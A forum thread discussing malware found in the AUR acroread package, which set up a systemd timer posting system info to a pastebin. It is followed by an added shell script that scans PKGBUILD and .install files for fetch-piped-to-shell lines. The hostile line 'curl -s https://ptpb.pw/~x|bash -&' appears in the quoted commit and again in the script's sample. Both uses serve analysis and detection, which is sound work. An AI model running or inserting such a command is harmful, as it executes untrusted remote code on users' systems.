Comment by Tharre
8 years ago
For the people interested, here's the actual commit from the acroread package:
https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...
Following the URLs, it appears that it sets up a systemd timer to post some system info to pastebin every hour. However, the script also appears to have a mistake which I think would cause it to only log to /root/home/*/compromised.txt.
$uploader "$FULL_LOG"
should be
upload "$FULL_LOG"
> + curl -s https://ptpb.pw/~x|bash -&
So much for being sneaky malware, he wasn't even trying to hide it... Any insertion of a `curl` command to some shady-looking TLD piping to bash is going to be a massive red flag to even unsophisticated Linux users.
Not much to see here, fortunately.
That "shady" domain is the official pastebin for freenode's Arch Linux IRC channel.
Even more so: the fact that it's well-known as a pastebin means that it should be obvious that data coming from it is user-generated and could come from anyone.
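The red flag the thread describes, a network fetch piped straight into a shell inside a package install script, is easy to check for mechanically before installing an AUR package. The following is an added example, not code from the thread or from the acroread package; the sample install-script text, the pattern and the helper names are all constructed here.

```sh
#!/bin/sh
# Constructed sample of an .install fragment, modelled on the pattern quoted in
# the thread. This is NOT the real acroread commit; the URL is left as in the quote.
SAMPLE_INSTALL='post_install() {
  curl -s https://ptpb.pw/~x|bash -&
  echo "done"
}'

# Extended regex: a curl/wget invocation followed, on the same line, by a pipe into
# sh/bash/dash/zsh. The trailing class stops "| shasum" from matching as "sh".
PIPE_TO_SHELL_RE='(curl|wget)[^|]*[|][[:space:]]*(ba|da|z)?sh([^[:alnum:]_]|$)'

# flag_pipe_to_shell TEXT: exit 0 if TEXT contains a fetch-piped-to-shell line.
# Usage: flag_pipe_to_shell "$(cat foo.install PKGBUILD)" && echo "review manually"
flag_pipe_to_shell() {
  printf '%s\n' "$1" | grep -Eq "$PIPE_TO_SHELL_RE"
}

# count_pipe_to_shell TEXT: print how many lines in TEXT match (0 if none).
count_pipe_to_shell() {
  printf '%s\n' "$1" | grep -Ec "$PIPE_TO_SHELL_RE" || true
}

# list_pipe_to_shell TEXT: print the offending lines with their line numbers,
# so a reviewer can look at them in context.
list_pipe_to_shell() {
  printf '%s\n' "$1" | grep -En "$PIPE_TO_SHELL_RE" || true
}

# Stand-alone run over the constructed sample: prints "2:  curl -s https://ptpb.pw/~x|bash -&"
list_pipe_to_shell "$SAMPLE_INSTALL"
```

Run it over every PKGBUILD and .install file in the package snapshot; a hit is not proof of malice, but it is exactly the line a human should read before running makepkg.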